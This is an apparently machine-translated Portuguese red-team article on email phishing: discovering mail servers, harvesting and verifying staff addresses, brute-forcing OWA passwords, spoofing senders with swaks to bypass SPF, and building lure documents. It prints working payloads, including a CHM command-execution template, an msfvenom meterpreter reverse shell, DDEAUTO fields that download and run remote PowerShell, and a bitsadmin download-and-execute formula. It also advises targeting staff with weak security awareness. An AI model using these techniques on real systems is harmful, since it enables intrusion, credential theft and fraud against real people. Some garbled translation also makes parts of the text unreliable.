Artigo Diretório
# Este artigo foi reproduzido na unidade Jiuxian No.6 Se houver algum inconveniente, pratique e exclua-o imediatamente.
Com o rápido desenvolvimento das informações na Internet, o trabalho de escritório é inseparável do suporte da rede. A caixa de correio tornou-se um dos métodos comuns de escritório.
Este artigo parte principalmente da premissa de coleta de informações como o primeiro passo e gradualmente se estende para a direção de phishing de e-mail, incluindo: espionagem de informações, verificação de informações, localização da caixa de correio, falsificação de conteúdo, falsificação de documentos e outros aspectos.
Durante o teste de penetração, também é uma forma comum de usar o método de gerenciamento de caixa de correio para realizar o método de "terraplenagem" do campo de batalha para cavar um pouco o interior do oponente.
Esta etapa é uma etapa importante no teste de penetração. É mais provável que você tente essa ação quando o sistema não tiver lacunas ou pistas. O coração do atacante sempre sentirá que essa combinação de coleta de informações + phishing de e-mail pode jogar o chamado "peixe que desliza pela rede".
Encontre a porta de serviço de e-mail aberta de destino e a entrada da caixa de correio do lado da web
(1) Encontre a entrada examinando a seção c
Quando obtemos o site de destino, devemos primeiro encontrar seu endereço IP real a partir do nome de domínio do registro MX (alguns destinos podem ser servidores de e-mail de terceiros, neste caso os registros mx são inúteis); quando obtemos o destino Ao usar um site , primeiro encontre seu endereço IP real a partir do nome de domínio do registro MX (alguns destinos podem ser servidores de e-mail de terceiros, neste caso os registros mx são inúteis); em seguida, faça a varredura do segmento c deste endereço IP (25, 109, 110, 143 , 465, 995, 993 portas), em circunstâncias normais, é fácil encontrar a entrada do servidor de correio de destino.
(2) Encontre a entrada de e-mail digitalizando o nome do subdomínio
Existem muitas ferramentas para escanear subdomínios, como Sublist3r, TeeMO, LangSrcCurise e Excavator.
(3) Rastreamento por meio de mecanismos de pesquisa
Hackear pesquisa do Google;
Baidu, Sogou, 360, bing.
site: target.com intitle: “Outlook Web App”
site: target.com intitle: “mail”
site: target.com intitle: “webmail”
Shodan, fofa, zoomeye search, etc.
Algumas maneiras convencionais de coletar caixas de correio de destino em lotes
https://hunter.io/
http://www.skymem.info/
https://www.email-format.com/i/search/
Esta ferramenta Timo também tem a capacidade de coletar caixas de correio de nomes de domínio relacionadas.
https://github.com/bit4woo/teemo
também tem maneiras de pesquisar caixas de correio de mecanismos de pesquisa, mecanismos de pesquisa espacial, redes sociais, sites de recrutamento, etc.
https://github.com/laramies/theHarvester
Essa ferramenta integra muitas apis por padrão, e podemos capturar caixas de correio de destino em lotes de maneira fácil e rápida por meio dessas interfaces. Como as apis são todas padrão, algumas não são preenchidas, portanto, os resultados são relativamente poucos; portanto, no processo de combate real, coopere com outras ferramentas para pesquisar e, em seguida, combine e resuma os resultados finais da consulta.
python3 theHarvester.py -d xxx.com -l 1000 -b all -f test.html
Verificar e-mail
Depois de coletar as caixas de correio, precisamos verificar as caixas de correio, porque alguns funcionários da empresa de destino da caixa de correio já desistiram ou as utilizaram (demissão, transferência de emprego, etc.).
(1) Você pode verificar se o endereço de e-mail existe em mailtester.com.
https://mailtester.com/testmail.php
(2) A ferramenta de verificação de e-mail pode verificar e-mails em lotes.
https://github.com/Tzeross/verifyemail
(3) mailtester.py
Essa ferramenta pode combinar endereços de e-mail automaticamente e, em seguida, verificar um por um de acordo com os resultados combinados.
A vantagem do script é que ele se reúne e combina à vontade de acordo com os nomes em Nome / Sobrenome e depois os verifica um por um.
Quando estivermos enumerando usuários de caixa de correio, tente encontrar o máximo de dicionários possível, como pinyin chinês, abreviações de letras top100, 1000, 10000, aqui precisamos de mais arpões, mais uma caixa de correio é a taxa de sucesso.
Claro, podemos extrair pessoas que são suspeitas de administradores de rede, pessoal de operação e manutenção e departamentos de segurança. Essas pessoas escrevem para suas caixas de correio sozinhas ou não as enviam. Como essas pessoas têm um conhecimento de segurança relativamente alto, são fáceis de obter começou. Precisamos estar seguros para alguns funcionários não técnicos. Pessoas com consciência fraca começam, pegam caquis macios e beliscam
Aqui você pode cooperar com este site https://www.aies.cn/pinyin.htm de acordo com as informações de destino coletadas para desenvolver um dicionário de nomes correspondente para combinação.
Explosão de caixa de correio
Este método de explosão de senha fraca só se aplica ao servidor de correio da própria empresa de destino, como owa, etc. Caixas de correio como Baidu, Tencent, Ali e NetEase não são priorizadas.
As ferramentas utilizadas são medusa, hydra, SNETCracker, organização APT34 owa ferramenta de detonação, etc.
Além disso, o nome de usuário e a senha do e-mail costumam usar a abreviatura da empresa +2019, 2020 e outras senhas de assistente social. Mais um dicionário aumentará a taxa de sucesso.
Falsificação de caixas de correio
. Em circunstâncias normais, se não houver SPF, você pode usar diretamente as trocas para a falsificação.
Aqui está uma breve conversa sobre spf e dkim.
SPF: Pode-se entender que sua função é confirmar se o endereço ip do e-mail está no registro spf de seu nome de domínio, caso esteja, significa um e-mail correto, caso contrário será descartado.
DKIM: Tem como função principal verificar se os dados do e-mail foram modificados durante o processo de transmissão, podendo também ser entendido simplesmente como garantia da integridade do e-mail durante o processo de envio.
No caso do SPF, você precisa ignorar o SPF, você pode usar swaps + smtp2go, você precisa usar a plataforma de hospedagem de correio para ignorar o monitoramento do SPF.
Configuração SMTP2GO:
Precisa criar uma conta e verificar o nome de domínio
swaks --para [email protected]
–de [email protected]
–ehlo xxx
–body “hello , i'm 007"
–server mail.smtp2go.com -p 2525 -au user -ap pass
Abaixo o endereço de e-mail aparecerá em nome da plataforma xxx, claro, pessoas que não olham com atenção ou não entendem a tecnologia são fáceis de serem enganadas.
Outro método também pode salvar arquivos no formato eml.
Exclua o campo anterior e modifique a caixa de correio do campo Para.
swaks --to test.163.com
–from [email protected]
–data 1.eml --h-from
–server mail.smtp2go.com -p 2525 -au user -ap pass
Produção de documentos de pesca
1) Arquivo de macro tradicional
2) Pesca CHM
Crie uma nova pasta e copie o seguinte código para index.html, e a ferramenta EasyCHM pode gerá-lo.
Aqui está uma calculadora pop-up que pode ser substituída por nosso cavalo de Tróia.
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=", calc.exe">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
Após a geração, dê um nome que seja fácil de ser fisgado.
3) CVE-2018-2174
endereço exp:
https://github.com/0x09AL/CVE-2018-8174-msf.git
4) Teclas de atalho do Windows
Primeiro, use o MSF para gerar uma carga útil:
msfvenom -p windows / meterpreter / reverse_tcp lhost = vpsip lport = 1234 -f msi> shell.txt
msiexec.exe, o processo do sistema, é uma parte do Windows Installer. Usar esse processo para carregar nosso shellcode pode obter um certo efeito de evasão.
Obviamente, o método não é único e existem muitas outras maneiras, como usar o PowerShell para baixar e executar remotamente seu próprio Trojan.
5) Construir documentos de phishing DDE
Crie um documento e, em seguida, clique duas vezes para abrir dde.docx, as teclas de atalho Ctrl + f9 diretamente podem ajudar a criar um domínio rapidamente, só precisamos adicionar as seguintes instruções entre as chaves (uma calculadora é exibida), podemos ser carregados remotamente durante o combate real do cavalo de Tróia.
DDEAUTO c: \ windows \ system32 \ cmd.exe “/ k calc.exe”
DDEAUTO "C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://xx.xx.xx.xx/1.ps1'); # " "Microsoft Document Security Add-On"
Fique online depois de clicar.
6) Inserindo um método de objeto externo (OLE) no word para enganar
Clique para ficar online.
7) Pesca de recurso IQY
Usando Out-WebQuery.ps1 em nishang, o script gera um arquivo iqy contendo o url de carga útil malicioso.
powershell –exec bypass –Command "& {Import-Module 'C:\Epic\nishang-master\Client\Out-WebQuery.ps1';Out-WebQuery -URL http://192.168.1.5/iqy.html}"
Escreva na página iqy.html:
=cmd|' /c bitsadmin /transfer c6c5 http://ip:port/a %APPDATA%\c6c5.exe&%APPDATA%\c6c5.exe&del %APPDATA%\c6c5.exe '!A0
A transmissão do bitadmin é muito lenta ...
Além do phishing, esse recurso também pode ser usado para roubar informações confidenciais, como a senha da conta do usuário-alvo.
8) Estrutura do recurso do botão de ação PPT Pesca PPSX
Como meu HTA está online aqui, pode ser devido à versão do sistema que sempre há um problema, então eu uso hta para carregar o ps e, em seguida, uso o ps para carregar e executar remotamente o cavalo cs especificado.
Deve ser salvo no formato ppsx aqui.
9) Pesca de descompressão RAR
Ex. Vulnerabilidade WinRAR:
https://github.com/WyAtu/CVE-2018-20250
Gerado e enviado para a máquina de destino para descompressão. Como a demonstração temporária não executou o processamento do antivírus, o cavalo foi interceptado pelo Tinder após reiniciar a máquina.
Além disso, há também o uso da página de phishing da porta de login de destino para roubar várias, VPN, Mail, OA, senhas de contas, etc. Os métodos e detalhes reais de phishing da equipe vermelha são muito diferentes.